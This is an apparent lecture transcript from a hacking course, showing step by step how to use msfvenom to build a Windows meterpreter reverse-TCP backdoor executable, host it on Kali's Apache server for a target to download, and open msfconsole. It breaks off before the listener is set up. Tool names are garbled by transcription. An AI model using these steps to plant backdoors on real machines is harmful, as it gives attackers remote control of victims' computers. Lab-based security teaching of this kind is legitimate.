Hello everyone. So in this lecture we're going to be talking about payload and backdoor. So the Metaxploit framework is the most commonly used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment, which is as interpreter, to manipulate the compromised machine. So now we'll look at the framework within Kali Linux that can be used to attack a Windows machine, and we'll do this through a malicious executable file using MSF Venom or Metaprettor. So now I will discuss how to create a backdoor. Then we'll use command or terminal to create a backdoor. Then we can actually use this executable backdoor on the Windows machine, and we'll send this to our target machine and we'll execute this, and then we will attack that machine using a communication channel that can operate the victim. So we'll create a backdoor using Metaxploit. So first of all, you need to turn on your Kali Linux machine, open terminal in here, and then just type msf venom. After that, we are going to select our use -p to select our payload, which will be our reverse TCP. So just type Windows slash Metaprettor slash reverse underscore TCP. Then so what we did, we use our MSF Venom, we select our payload, which is Windows Metaprettor reverse TCP. Then we need to define an IP address of our Kali Linux machine. So we need to select our L host, which is the Kali Linux machine IP address. L host is equal to, so let's check our Kali Linux machine. So let's create another terminal, type ifconfig. So let's see. So this is our L host. So just type 192.168.1.102. Then we're going to select our L port. You can select any port you want, but I'm going to select port as 12345, a random port. You can choose any port you want. Then we need to select our executable or extension format. So what you need to do is you need to type -f, which is our extension format, and our extension will be executable file, which is exe. So exe is our executable file. Then after that we are going to have to select our name our executable file. Just then type -o, then name as Windows backdoor. So let's type backdoor dot exe. So then press enter. It will take some time, like 10 to 15 seconds. Then it will initialize this payload under this L host and under this L port, using this name and using this executable file. So as you can see, Windows backdoor is created, and it created where? It created in root. So let's just show if this is created or not. Go to root. So we need a root access to go in here. So just type root. So give root access. As you can see, it has. So as you can see, it created a Windows backdoor payload, which is our exe or executable file. So this is going to be our executable file to perform our security breach. So we need to use. So what you need to do is now. So you need to move this file into your service folder or your Apache server, which is located in here. So I already pasted this file here. As you can see, Windows backdoor. So we need to do is you need to copy this file in here or make a folder and paste this in here like I did, because Kali Linux has a built-in web server, so that you can transfer this executable payload into your attacker machine, which is our Windows machine. Then what you need to do is we need to give our permission. So just type ls to list all of those files in here, and then type chmod plus x, then the name of the file, which is Windows. Just type place tab and it will automatically rename all of those. So just type this and list again. As you can see, it is now executable because it's showing in green. So let's just copy this and send it to in here, because it is on previous file. So let's just delete this and send it our this file. So copy var to our Apache server and into this folder. So let's just copy this. Then what you need to do now is you need to open your restart your Apache server, because you cannot visit your server unless you restart it. Because, okay, let's show you this, because 192.168, as you can see, I cannot visit in here because my Apache server is not open. So let's just open service apache.start. So as you can see, just reload this page 192.168 192. As you can see, it loaded and it has a Windows backdoor that we created right now. So right after that, after our web server is open, we need to open our MSF console. So let's just open MSF console in a new tab. So just type MSF console and it will load your Metapredator framework. As you can see, Metaexploit framework, it load up. So next I will show you how we can use this to gain access or send this file to your Windows machine and get your payload and receive and privileges and all of those using this metasploit.